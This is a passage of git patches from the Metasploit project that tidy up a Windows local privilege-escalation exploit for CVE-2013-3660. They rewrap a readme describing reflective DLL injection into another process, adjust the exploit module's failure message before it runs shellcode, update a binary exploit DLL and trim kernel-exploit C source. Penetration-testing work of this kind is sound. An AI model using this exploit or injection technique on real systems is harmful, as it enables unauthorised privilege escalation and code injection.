-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT   __declspec( dllexport ) 
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/rdi.sln b/external/source/exploits/cve-2013-3660/rdi.sln
index ee7fc4ace6..0a0dde7c06 100755
--- a/external/source/exploits/cve-2013-3660/rdi.sln
+++ b/external/source/exploits/cve-2013-3660/rdi.sln
@@ -1,44 +1,18 @@
 
 Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Express 2012 for Windows Desktop
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject\inject.vcxproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
-EndProject
+# Visual C++ Express 2010
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|ARM = Debug|ARM
 		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-		Release|ARM = Release|ARM
 		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.ActiveCfg = Release|ARM
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.Build.0 = Release|ARM
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.ActiveCfg = Release|x64
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.Build.0 = Release|x64
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.ActiveCfg = Release|ARM
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.Build.0 = Release|ARM
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.ActiveCfg = Release|x64
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.Build.0 = Release|x64
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM
 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM
 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

From de245113afb200438948a11858653aaa63e2c852 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sat, 29 Jun 2013 09:29:09 -0500
Subject: [PATCH 09/11] Wrap Reflective DLL Readme.md to 80 columns

---
 .../source/exploits/cve-2013-3660/Readme.md   | 61 ++++++++++++++-----
 1 file changed, 46 insertions(+), 15 deletions(-)

diff --git a/external/source/exploits/cve-2013-3660/Readme.md b/external/source/exploits/cve-2013-3660/Readme.md
index 814e6e7517..8670897457 100755
--- a/external/source/exploits/cve-2013-3660/Readme.md
+++ b/external/source/exploits/cve-2013-3660/Readme.md
@@ -1,36 +1,67 @@
 About
 =====
 
-Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.
+Reflective DLL injection is a library injection technique in which the concept
+of reflective programming is employed to perform the loading of a library from
+memory into a host process. As such the library is responsible for loading
+itself by implementing a minimal Portable Executable (PE) file loader. It can
+then govern, with minimal interaction with the host system and process, how it
+will load and interact with the host.
 
-Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.
+Injection works from Windows NT4 up to and including Windows 8, running on x86,
+x64 and ARM where applicable.
 
 Overview
 ========
 
-The process of remotely injecting a library into a process is two fold. Firstly, the library you wish to inject must be written into the address space of the target process (Herein referred to as the host process). Secondly the library must be loaded into that host process in such a way that the library's run time expectations are met, such as resolving its imports or relocating it to a suitable location in memory.
+The process of remotely injecting a library into a process is two fold. Firstly,
+the library you wish to inject must be written into the address space of the
+target process (Herein referred to as the host process). Secondly the library
+must be loaded into that host process in such a way that the library's run time
+expectations are met, such as resolving its imports or relocating it to a
+suitable location in memory.
 
-Assuming we have code execution in the host process and the library we wish to inject has been written into an arbitrary location of memory in the host process, Reflective DLL Injection works as follows.
+Assuming we have code execution in the host process and the library we wish to
+inject has been written into an arbitrary location of memory in the host
+process, Reflective DLL Injection works as follows.
 
-* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table.
-* As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.
-* The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
-* The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.
-* The library's headers and sections are loaded into their new locations in memory.
-* The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.
-* The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.
-* The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory.
-* Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate.
+* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap
+shellcode, to the library's ReflectiveLoader function which is an exported
+function found in the library's export table.
+* As the library's image will currently exists in an arbitrary location in
+memory the ReflectiveLoader will first calculate its own image's current
+location in memory so as to be able to parse its own headers for use later on.
+* The ReflectiveLoader will then parse the host processes kernel32.dll export
+table in order to calculate the addresses of three functions required by the
+loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
+* The ReflectiveLoader will now allocate a continuous region of memory into
+which it will proceed to load its own image. The location is not important as
+the loader will correctly relocate the image later on.
+The library's headers and sections are loaded into their new locations in
+memory.
+* The ReflectiveLoader will then process the newly loaded copy of its image's
+import table, loading any additional library's and resolving their respective
+imported function addresses.
+* The ReflectiveLoader will then process the newly loaded copy of its image's
+relocation table.
+* The ReflectiveLoader will then call its newly loaded image's entry point
+function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully
+loaded into memory.
+* Finally the ReflectiveLoader will return execution to the initial bootstrap
+shellcode which called it, or if it was called via CreateRemoteThread, the
+thread will terminate.
 
 Build
 =====
 
-Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release mode to make inject.exe and reflective_dll.dll
+Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release
+mode to make inject.exe and reflective_dll.dll
 
 Usage
 =====
 
-To test use the inject.exe to inject reflective_dll.dll into a host process via a process id, e.g.:
+To test use the inject.exe to inject reflective_dll.dll into a host process via
+a process id, e.g.:
 
 > inject.exe 1234
 	

From a2b8daf14967b257eb47371f8fa8387b5e826f37 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sat, 29 Jun 2013 10:45:13 -0500
Subject: [PATCH 10/11] Modify fail message when exploitation doen't success

---
 modules/exploits/windows/local/ppr_flatten_rec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 5f83031da7..34a167b2d4 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Local
 		if is_system?
 			print_good("Exploitation successful!")
 		else
-			fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful")
+			fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful but should be safe to try again")
 		end
 
 		if execute_shellcode(payload.encoded)

From a4d353fcb3b783d5a106c7b2a519f2eb523ffa8e Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sat, 29 Jun 2013 15:15:27 -0500
Subject: [PATCH 11/11] Clean a little more the VS project

---
 data/exploits/cve-2013-3660/exploit.dll       | Bin 51200 -> 51200 bytes
 .../cve-2013-3660/dll/reflective_dll.vcxproj  |   3 ++-
 .../cve-2013-3660/dll/src/ReflectiveDll.c     |   4 ----
 3 files changed, 2 insertions(+), 5 deletions(-)

diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll
index 706e1e1d246dc6a15955ca217e3000901f2fa1f6..cbb761b5684f8cb8368acd08e349616f8e5fab04 100755
GIT binary patch
delta 65
zcmZpez}zr_c>yDHi0%2w%#6Ow-=!Hh2Qxa>fdn>BulJP^$c{Y6$hl9%Yf;TfotwvG
RA8r0JyMPNUoxW_QA^`pC8Ik}1

delta 65
zcmZpez}zr_c>yD{&+BuOnHhbVoqjNE4rX+$0|{)NUhgX-aN)3@x$bOdhsKKkbKSd+
T3vB)}yMT+?8z`N=Y^EXrQIZ?p

diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
index 1aae9cb3e1..ed6cacb681 100755
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
+++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
@@ -191,7 +191,8 @@
       <TargetMachine>MachineX86</TargetMachine>
     </Link>
     <PostBuildEvent>
-      <Command>copy ..\Release\reflective_dll.dll ..\bin\</Command>
+      <Command>
+      </Command>
     </PostBuildEvent>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
index 29a70cc393..547fd1fd85 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
+++ b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
@@ -633,10 +633,6 @@ VOID elevator_complex_path()
                          PAGE_SIZE * 2,
                          MEM_COMMIT | MEM_RESERVE,
                          PAGE_EXECUTE_READWRITE)) {
-    //while (!VirtualAlloc(*DispatchRedirect & ~(0x1000 - 1),
-    //                     0x1000 * 2,
-    //                     MEM_COMMIT | MEM_RESERVE,
-    //                     PAGE_EXECUTE_READWRITE)) {
 
         LogMessage(L_WARN, "\tVirtualAlloc(%#x) => %#x",
                             *DispatchRedirect & ~(PAGE_SIZE - 1),